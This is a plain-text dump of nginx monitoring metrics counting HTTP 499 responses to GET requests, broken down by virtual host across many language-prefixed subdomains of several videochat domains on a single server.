nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="cy.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="cy.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="cy.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="cy.videochat.tv.br"} 90 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="cy.videochat.world"} 163 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="cytjruk.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="czhdzka.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="da.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="da.videochat.date"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="da.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="da.videochat.show"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="da.videochat.tv.br"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="da.videochat.world"} 351 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ddb00497-7d32-400e-85c8-bc34712fde6d.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="de.videochat.cafe"} 189 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="de.videochat.date"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="de.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="de.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="de.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="de.videochat.world"} 370 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="demo.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="dev.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ee.videochat.cafe"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ee.videochat.date"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ee.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ee.videochat.show"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ee.videochat.tv.br"} 187 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ee.videochat.world"} 258 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="el.videochat.cafe"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="el.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="el.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="el.videochat.show"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="el.videochat.tv.br"} 381 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="el.videochat.world"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="en.videochat.cafe"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="en.videochat.mx"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="en.videochat.tv.br"} 94 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="eo.videochat.cafe"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="eo.videochat.date"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="eo.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="eo.videochat.show"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="eo.videochat.tv.br"} 733 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="eo.videochat.world"} 137 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="es.videochat.cafe"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="es.videochat.date"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="es.videochat.show"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="es.videochat.tv.br"} 475 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="es.videochat.world"} 444 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="esiityi.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="et.videochat.cafe"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="et.videochat.date"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="et.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="et.videochat.show"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="et.videochat.tv.br"} 665 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="et.videochat.world"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="eu.videochat.cafe"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="eu.videochat.date"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="eu.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="eu.videochat.show"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="eu.videochat.tv.br"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="eu.videochat.world"} 310 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fa.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fa.videochat.date"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fa.videochat.mx"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fa.videochat.show"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fa.videochat.tv.br"} 233 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fa.videochat.world"} 144 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fi.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fi.videochat.date"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fi.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fi.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fi.videochat.tv.br"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fi.videochat.world"} 464 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fr.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fr.videochat.date"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fr.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fr.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fr.videochat.tv.br"} 188 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fr.videochat.world"} 381 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ga.videochat.cafe"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ga.videochat.date"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ga.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ga.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ga.videochat.tv.br"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ga.videochat.world"} 143 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="gl.videochat.cafe"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="gl.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="gl.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="gl.videochat.show"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="gl.videochat.tv.br"} 72 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="gl.videochat.world"} 373 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="gu.videochat.cafe"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="gu.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="gu.videochat.mx"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="gu.videochat.show"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="gu.videochat.tv.br"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="gu.videochat.world"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="he.videochat.cafe"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="he.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="he.videochat.mx"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="he.videochat.show"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="he.videochat.tv.br"} 246 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="he.videochat.world"} 97 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hi.videochat.cafe"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hi.videochat.date"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hi.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hi.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hi.videochat.tv.br"} 253 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hi.videochat.world"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hr.videochat.cafe"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hr.videochat.date"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hr.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hr.videochat.show"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hr.videochat.tv.br"} 212 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hr.videochat.world"} 328 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ht.videochat.cafe"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ht.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ht.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ht.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ht.videochat.tv.br"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ht.videochat.world"} 223 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hu.videochat.cafe"} 117 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hu.videochat.date"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hu.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hu.videochat.show"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hu.videochat.tv.br"} 138 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hu.videochat.world"} 219 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="huvcgmi.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="iclgzbs.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="id.videochat.cafe"} 75 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="id.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="id.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="id.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="id.videochat.tv.br"} 130 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="id.videochat.world"} 414 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ip-api.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="is.videochat.cafe"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="is.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="is.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="is.videochat.show"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="is.videochat.tv.br"} 395 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="is.videochat.world"} 154 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="it.videochat.cafe"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="it.videochat.date"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="it.videochat.mx"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="it.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="it.videochat.tv.br"} 881 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="it.videochat.world"} 208 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="jaiyuba.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="jggpsno.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="jp.videochat.cafe"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="jp.videochat.date"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="jp.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="jp.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="jp.videochat.tv.br"} 962 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="jp.videochat.world"} 93 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="jv.videochat.cafe"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="jv.videochat.date"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="jv.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="jv.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="jv.videochat.tv.br"} 263 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="jv.videochat.world"} 125 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ka.videochat.cafe"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ka.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ka.videochat.mx"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ka.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ka.videochat.tv.br"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ka.videochat.world"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kbmjvka.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kjjlaro.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kk.videochat.cafe"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kk.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kk.videochat.mx"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kk.videochat.show"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kk.videochat.tv.br"} 230 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kk.videochat.world"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="km.videochat.cafe"} 48 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="km.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="km.videochat.show"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="km.videochat.tv.br"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="km.videochat.world"} 68 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kn.videochat.cafe"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kn.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kn.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kn.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kn.videochat.tv.br"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kn.videochat.world"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ko.videochat.cafe"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ko.videochat.date"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ko.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ko.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ko.videochat.tv.br"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ko.videochat.world"} 111 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kxxgdaz.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kxylkid.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ky.videochat.cafe"} 98 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ky.videochat.date"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ky.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ky.videochat.show"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ky.videochat.tv.br"} 283 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ky.videochat.world"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lb.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lb.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lb.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lb.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lb.videochat.tv.br"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lb.videochat.world"} 465 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lilvami.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lo.videochat.cafe"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lo.videochat.date"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lo.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lo.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lo.videochat.tv.br"} 282 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lo.videochat.world"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lt.videochat.cafe"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lt.videochat.date"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lt.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lt.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lt.videochat.tv.br"} 216 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lt.videochat.world"} 336 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lv.videochat.cafe"} 39 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lv.videochat.date"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lv.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lv.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lv.videochat.tv.br"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lv.videochat.world"} 160 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mg.videochat.cafe"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mg.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mg.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mg.videochat.show"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mg.videochat.tv.br"} 316 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mg.videochat.world"} 308 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mi.videochat.cafe"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mi.videochat.date"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mi.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mi.videochat.show"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mi.videochat.tv.br"} 84 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mi.videochat.world"} 280 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mk.videochat.cafe"} 88 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mk.videochat.date"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mk.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mk.videochat.show"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mk.videochat.tv.br"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mk.videochat.world"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ml.videochat.cafe"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ml.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ml.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ml.videochat.show"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ml.videochat.tv.br"} 45 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ml.videochat.world"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mn.videochat.cafe"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mn.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mn.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mn.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mn.videochat.tv.br"} 711 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mn.videochat.world"} 97 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mr.videochat.cafe"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mr.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mr.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mr.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mr.videochat.tv.br"} 244 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mr.videochat.world"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mrj.videochat.cafe"} 87 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mrj.videochat.date"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mrj.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mrj.videochat.show"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mrj.videochat.tv.br"} 402 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mrj.videochat.world"} 96 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ms.videochat.cafe"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ms.videochat.date"} 39 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ms.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ms.videochat.show"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ms.videochat.tv.br"} 997 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ms.videochat.world"} 365 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mt.videochat.cafe"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mt.videochat.date"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mt.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mt.videochat.show"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mt.videochat.tv.br"} 414 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mt.videochat.world"} 186 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mta-sts.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="my.videochat.cafe"} 12 